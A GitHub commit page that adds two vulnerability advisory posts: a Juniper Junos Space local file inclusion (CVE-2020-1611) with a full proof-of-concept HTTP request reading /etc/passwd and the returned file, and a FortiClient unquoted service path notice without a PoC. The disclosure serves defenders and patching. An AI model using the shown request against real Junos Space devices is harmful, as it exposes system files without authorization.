Skip to content

Commit

Permalink
Add Junos Space and FortiClient posts
Browse files Browse the repository at this point in the history
  • Loading branch information
Ibonok committed May 19, 2020
1 parent 2d89df5 commit f2e5aa5
Show file tree
Hide file tree
Showing 3 changed files with 129 additions and 0 deletions.
1 change: 1 addition & 0 deletions .gitignore
Original file line number Diff line number Diff line change
Expand Up @@ -47,6 +47,7 @@ build-iPhoneSimulator/
## Environment normalization:
/.bundle/
/vendor/bundle
/vendor/ruby
/lib/bundler/man/

# for a library or gem, you might want to ignore these files since the code is
Expand Down
97 changes: 97 additions & 0 deletions _posts/2020-01-31-junos-space-local-file-inclusion.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,97 @@
---
title: Juniper Junos Space Local File Inclusion Vulnerability
description: Juniper Junos Space prior to 19.4R1 Local File Inclusion Vulnerability
header: Juniper Junos Space prior to 19.4R1 Local File Inclusion Vulnerability
---
A Local File Inclusion vulnerability (CVE-2020-1611) in Juniper Networks Junos Space allows an attacker to view all files on the target when the device receives malicious HTTP packets.

<!--more-->

## Juniper Junos Space Local File Inclusion
Juniper Junos Space prior to 19.4R1 is vulnerable to a local file inclusion vulnerability. An attacker with normal user rights could exploit this vulnerability.

The "Download Report" function is vulnerable.

Base Score: 6.5<br />
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Links:

- https://nvd.nist.gov/vuln/detail/CVE-2020-1611
- https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10993

### Example

GET Parameters:

- Set "Format" to "txt"
- Set "FileUrl" to a local path

Request:<br />

```http
GET /mainui/download?X-CSRF=Y581SFvKU5INQPItBUoNj4NKf4IuqjSyywfRylPN3GLYaML3fM074gV2AIPBQjHEJsuJ9d7
&type=downloadGROpenReport&_browserId=1553107455361
&FileUrl=/etc/passwd&Format=txt&nodeHost=space-000311c3b873 HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://10.10.10.10/mainui/nLegacy.jsp?bid=1553107455361&appName=CMP
DNT: 1
Connection: close
Cookie: ext-$sidebar_gettingStarted_checkbox=o%3Achecked%3Db%253A0;
DWRSESSIONID=sicWsVGWEjxdNYR7RJ60rCtbBrOmy0JHBm4h;
JSESSIONID="aoVrgUa7V1prIWVO5KEmCqF6QGuuYZ44RshRxEYHAJXqQDCNBjV6pLKiaaXQx2jWjGWw5TxnDxkKtsi
_.space-000311c3b873:server3";
JSESSIONIDSSO=Cm5qb87syONJ2lku1dadTx-SVyaoy0k9lt-bwSnTkfFrdONVfvmzrxB+g8xny4gjyKk_;
X-CSRF=Y581SFvKU5INQPItBUoNj4NKf4IuqjSyywfRylPN3GLYaML3fM074gV2AIPBQjHEJsuJ9d7; JxRunningBids=_1553107455361_
```

<br />Response:<br />

```http
HTTP/1.1 200 OK
Date: Wed, 24 Apr 2019 13:32:31 GMT
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Pragma: No-cache
Cache-Control: no-cache,no-store,must-revalidate,private
Expires: Thu, 01 Jan 1970 00:00:00 UTC
Content-Disposition: attachment; filename="passwd"
Content-Type: application/octet-stream
Content-Length: 1345
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mysql:x:499:499:MySQL server:/var/lib/mysql:/sbin/nologin
cassandra:x:498:498::/var/lib/cassandra:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
gluster:x:497:497:GlusterFS daemons:/var/run/gluster:/sbin/nologin
jboss:x:500:500::/usr/local/jboss:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:496:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
unbound:x:495:495:Unbound DNS resolver:/etc/unbound:/sbin/nologin
redis:x:494:494:Redis Server:/var/lib/redis:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
slipstream:x:493:493::/usr/local//slipstream/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74::/var/empty/sshd:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
pcap:x:77:77:::/sbin/nologin
opennms:x:503:504::/home/opennms:/bin/bash
cassandr:x:504:505::/home/cassandr:/bin/bash
```
<br />
**Michael Wollner** ([@Ibonok](https://github.com/Ibonok))
31 changes: 31 additions & 0 deletions _posts/2020-03-09-forticlient-unquoted-service-path.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
---
title: Unquoted Service Path exploit in Fortinet FortiClient
description: Unquoted Service Path exploit in FortiClient (CVE-2019-17658)
header: Unquoted Service Path exploit in Fortinet FortiClient
---
FortiClient for Windows prior to 6.2.3 is vulnerable to an unquoted service path vulnerability (CVE-2019-17658). That may allow an attacker to gain elevated privileges via the FortiClientConsole executable service path.

<!--more-->

Base Score: 9.8

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

### Affected Component
FortiClient FortiTray

### Affected Products
FortiClient for Windows Versions 6.2.2 and below.

### Patched in Version
FortiClient for Windows version 6.2.3 or above.

### PoC

Private: The PoC is not published because it's obvious.

### Links:
- https://nvd.nist.gov/vuln/detail/CVE-2019-17658
- https://fortiguard.com/psirt/FG-IR-19-281

**Michael Wollner** ([@Ibonok](https://github.com/Ibonok))

0 comments on commit f2e5aa5

Please sign in to comment.